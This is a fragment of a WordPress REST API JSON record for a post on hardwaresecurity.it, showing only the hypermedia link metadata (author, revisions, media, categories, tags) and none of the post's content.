[&hellip;]","_links":{"self":[{"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=\/wp\/v2\/posts\/548","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=548"}],"version-history":[{"count":1,"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=\/wp\/v2\/posts\/548\/revisions"}],"predecessor-version":[{"id":560,"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=\/wp\/v2\/posts\/548\/revisions\/560"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=\/wp\/v2\/media\/505"}],"wp:attachment":[{"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=548"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=548"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.hardwaresecurity.it\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=548"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}